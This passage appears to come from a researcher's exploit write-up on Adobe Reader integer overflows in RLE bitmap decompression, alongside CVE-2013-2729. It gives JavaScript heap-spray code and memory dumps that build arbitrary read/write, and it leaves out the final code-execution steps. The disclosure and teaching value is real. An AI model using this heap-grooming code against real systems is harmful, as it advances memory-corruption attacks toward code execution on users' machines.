We can avoid the crash if we can make 0x10101010 acts like a valid pointer. Obviously, we should arrange the memory layout before triggering the vulnerability. To make it more stable, it should be done even before we create and free the ArrayBuffer objects.

We need the ability to put any value at any memory address, such as 0x10101010 . To achieve this goal, we can create lots of ArrayBuffer objects with byteLength setting to 0xFFE8 . That’s a carefully selected size to make sure that the ArrayBuffer objects will be allocated at predictable addresses.

// 0xFFE8 -> byteLength
// 0x10 -> sizeof ObjectElements
// 0x08 -> sizeof heap block's metadata
0xFFE8 + 0x10 + 0x08 = 0x10000

I’m not going to discuss how to avoid the crash in details, it’s very easy to figure out the specific conditions. Following code can be used to avoid the crash.

function fillHeap() {
    var array = new Array(0x1200);
    array[0] = new ArrayBuffer(0xFFE8);
    var dv = new DataView(array[0]);

    dv.setUint32(0xFB8, 0x10100058, true);
    dv.setUint32(0, 0x10100158, true);
    dv.setUint32(0xFFA8, 0x10100258, true);
    dv.setUint32(0x200 + 0x14, 0x10100358, true);

    for (var i = 1; i < array.length; ++i) {
        array[i] = array[0].slice();
    }
    return array;
}

It’s not done yet. The process still crashes when we try to create a new DataView object for it. We can avoid the crash using the same tricks. Following is the improved code.

function fillHeap() {
    var array = new Array(0x1200);
    array[0] = new ArrayBuffer(0xFFE8);
    var dv = new DataView(array[0]);
    // avoid crash when triggering the vulnerability
    dv.setUint32(0xFB8, 0x10100058, true);
    dv.setUint32(0, 0x10100158, true);
    dv.setUint32(0xFFA8, 0x10100258, true);
    dv.setUint32(0x200 + 0x14, 0x10100358, true);
    // avoid crash when creating new DataView objects
    dv.setUint32(0xFFA4, 0x10100458, true);

    for (var i = 1; i < array.length; ++i) {
        array[i] = array[0].slice();
    }
    return array;
}

5.5.3 Global Read / Write

Once we overwrote the byteLength of any ArrayBuffer object with 0x10101010 , we can leverage this ArrayBuffer object to overwrite next one’s byteLength to 0xFFFFFFFF . It’s very easy to search the next ArrayBuffer object if we put a flag value within all the ArrayBuffer objects.

  (1)byteLength            (3)Global Access
 ┌─<───<───<───┐            <──────┬──────>
┌┼────────────┬┼────────────┬──────┼──────┬─────────────┐
│ ArrayBuffer │ Bitmap Data │ ArrayBuffer │     Hole    │
└──────┼──────┴─────────────┴┼────────────┴─────────────┘
       └──>───>───>───>────>─┘
        (2) byteLength to -1

Now we have the ability to read and write any memory address within the user space.

5.5.4 Absolute Address Access

Once we have the global access ability, we can search backward to calculate the base address of the ArrayBuffer object’s backing store buffer, thus we can read and write at any given absolute memory address.

We can search two flags, ffeeffee or f0e0d0c0 , to calculate the base address. To make it more accurate, the bytes around the flag value also need to be verified.

0:014> dd 30080000
30080000  16b80e9e 0101331b ffeeffee 00000002  ; ffeeffee
30080010  055a00a4 2f0b0010 055a0000 30080000  ; +0x14 -> 30080000
30080020  00000fcf 30080040 3104f000 000002e5
30080030  00000001 00000000 30d69ff0 30d69ff0
30080040  3eb82e96 08013313 00000000 0000ffe8
30080050  00000000 00000000 10100158 00000000
30080060  00000000 00000000 00000000 00000000
30080070  00000000 00000000 00000000 00000000

0:014> dd 305f4000
305f4000  00000000 00000000 6ab08d69 0858b71a
305f4010  0bbab388 30330080 0ff00112 f0e0d0c0  ; f0e0d0c0
305f4020  15dc2c3f 00000430 305f402c d13bc929  ; +0x0C -> 305f402c
305f4030  e5c521a7 d9b264d4 919cee58 45da954e
305f4040  5c3f608b 2b5fd340 0bae3aa9 2b5fd340
305f4050  0fae32aa d13bc929 e5c521a7 d9b264d4
305f4060  919cee58 45da954e 9c3f608b f952aa94
305f4070  989c772a a1dd934a ac5b154b 2fadd038

5.5.5 Remaining Steps

Once we can read and write at any given absolute memory address, it’s very easy to achieve code execution. Following are the remaining steps that will not be discussed in this post:

EIP hijack
ASLR bypass
DEP bypass
CFG bypass

0x06. CVE-2013-2729

Three integer overflows were found within the handling of RLE compressed data, one in RLE8 decompression and the other two in RLE4 decompression.

Why shouldn’t we found four? Because another one have been patched six years ago. You can read feliam’s write up for CVE-2013-2729 if you haven’t read it yet.

Also, the patch for CVE-2013-2729 can be found within the handling of RLE8 compressed data.

dst_xpos = BYTE1(cmd) + xpos;
if ( ypos >= height || dst_xpos < xpos || 
     dst_xpos < BYTE1(cmd) || dst_xpos > width )  // overflow check
  goto LABEL_170;         // CxxThrowException

It’s astonishing that Adobe only patched the case that was reported and ignored the other three.

0x07. Lessons Learned

For product developers, please try to understand the root cause of the vulnerability and eliminate similar ones as much as you can.

For security researchers, patch analysis is a good way to figure out what the developers were thinking, and maybe you can find bypass solutions (this happens sometimes).